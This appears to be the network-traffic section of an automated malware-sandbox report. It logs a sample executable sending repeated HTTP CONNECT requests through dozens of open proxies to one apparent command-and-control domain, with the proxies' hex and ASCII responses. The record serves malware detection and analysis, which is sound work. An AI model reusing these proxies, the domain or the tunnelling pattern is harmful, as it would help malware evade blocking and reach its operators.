                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      558192.168.2.45090745.67.210.4733896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.162723064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.178307056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.178745031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.974772930 CET131INHTTP/1.1 503 Too many open connections
                                                                                                      Content-Type: text/plain
                                                                                                      Connection: close
                                                                                                      Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                                      Data Ascii: Maximum number of open connections reached.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      559192.168.2.451764141.94.174.630966812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.162992954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      560192.168.2.45185467.43.227.227189636812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.163175106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      561192.168.2.45185923.19.244.10910806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.163506985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      562192.168.2.451825207.244.252.14541906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.163510084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.586987019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      563192.168.2.451862104.16.104.12806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.163741112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.251611948 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      564192.168.2.451767113.30.149.76806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.164169073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      565192.168.2.45186991.231.186.1334436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.164453030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      566192.168.2.45179974.119.144.6041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.164485931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      567192.168.2.45170558.234.116.197806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.164694071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      568192.168.2.45173793.126.56.3041536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.165245056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      569192.168.2.451789185.245.60.1031286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.165932894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.680803061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.366280079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.475079060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.680536032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.865900993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.975218058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.178868055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      570192.168.2.451699115.171.217.4878916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.166168928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.865708113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.866157055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      571192.168.2.45175845.239.175.1980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.169933081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.378447056 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      572192.168.2.45179551.210.45.14887726812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.170489073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      573192.168.2.45180394.241.173.3780806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.180061102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      574192.168.2.451703210.209.236.26806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.180529118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.516313076 CET326INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      575192.168.2.45179445.159.189.24431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.181365967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      576192.168.2.45168769.231.162.16131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.183592081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.558223009 CET146INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: PHP/5.4.7
                                                                                                      Server: squid/4.10
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:21.931250095 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:
                                                                                                      Feb 23, 2024 09:45:21.931647062 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      577192.168.2.45175594.20.183.172806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.193866968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      578192.168.2.451541183.234.215.1184436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.198040962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.852457047 CET314INHTTP/1.1 405 Not Allowed
                                                                                                      Server: nginx/1.24.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.24.0</center></body></html>
                                                                                                      Feb 23, 2024 09:45:23.166928053 CET314INHTTP/1.1 405 Not Allowed
                                                                                                      Server: nginx/1.24.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      579192.168.2.45184445.81.232.17480856812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.208529949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.724931955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      580192.168.2.45177793.90.212.241536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.222162008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      581192.168.2.450853115.244.127.160806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.225159883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      582192.168.2.451735103.53.170.19931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.226632118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.943783998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.030405045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.022423029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      583192.168.2.45173859.15.28.7631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.234407902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.943783998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:03.738174915 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      584192.168.2.45179795.56.254.13931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.270817041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.974914074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.866034031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.141721010 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      585192.168.2.451891203.22.223.12806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.275784016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.363050938 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      586192.168.2.45175127.77.237.9310806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.276767015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      587192.168.2.451745120.79.101.088886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.281549931 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:21.626554012 CET309INHTTP/1.1 502 Bad Gateway
                                                                                                      Server: nginx/1.25.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
